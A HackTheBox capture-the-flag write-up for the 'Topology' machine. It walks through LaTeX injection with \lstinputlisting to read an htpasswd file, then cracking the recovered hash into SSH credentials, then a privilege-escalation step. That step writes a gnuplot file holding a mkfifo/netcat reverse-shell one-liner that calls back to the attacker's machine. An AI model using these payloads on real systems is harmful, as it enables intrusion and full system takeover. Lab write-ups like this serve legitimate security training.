TOPOLOGY HTB 

Hey Hackers!

  “You will prosper if you focus on yourself, compete with yourself and challenge yourself to be a better person.”

                                                                            ― Happiness Shuma      

        A topology is an easy-level machine on hackthebox. The challenging part is getting user privilege

and the privilege escalation part which was usual and common 

Enumeration

Call your friend Nmap to check the ports and service of the respective machine  

As usual, go check the web server by placing the IP address on /etc/hosts: 10.10.11.217 topology.htb

SUBDOMAIN ENUMERATION

SUBDOMAIN ENUMERATION

Here we got two directories which are stats and dev 

place the 10.10.11.217 dev.topology on /etc/hosts 

WEBSERVER

Go click LaTeX Equation Generator 

Latex Equation 

 

LaTeX Equation Generator: latex is a mathematical concept we don't need to go in-depth on that concept. Here they will convert the input (a mathematical expression ) to the output (in png format). So we going to inject latex injection here by manipulating the get request in the search engine. If you guys need to know more about latex injection will give the reference link at the end of the writeup 

LATEX INJECTION

And you will redirect to the webpage as given below  

TO READ FILE: \lstinputlisting{} -- inside curly braces you can give which file you need to read with respect to the path.

In addition, store it in the variable $ 

And finally hit the generate button

Respected output for the given input 

Subdomain { dev.topology.htb }

Let's check the hosting service using wappalyzer 

So an Idea rises in my mind 

Hope! you also got it 

Yeah we can place this exact location to the get request of the latex generator to view the password credential for the webpage that requesting for authentication 

 

latex injection

After injecting the payload lets hit the generator button 

There you got the password hash for the user vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0

Let's crack the hash using Johntheripper tool 

Have a try in SSH 

SSH CREDENTIAL 

user: vdaisley

password: calculus20

USER FLAG 

Privilege Escalation

Run bash linpeas.sh

Linpeas

As mentioned below most of the time /opt will be empty but this time I got the gnuplot directory which is a software used to plot the measurements in latex. So by searching on Google I found just placing the customized file with the extension *.plt it will automatically run with root privilege 

 

So I created one line command to get the root shell 

command : echo "system 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your machine IP> 1234 >/tmp/f'" > /opt/gnuplot/hack.plt

Before running the above command don't forget to run a listener on your system with Netcat as I mentioned in the above screenshot

Thank you for reading my writeup 

Hopefully, wait for the next exciting writeup that will be posted in the upcoming days 

REFERENCES:

https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection

http://www.gnuplot.info/docs_4.2/node327.html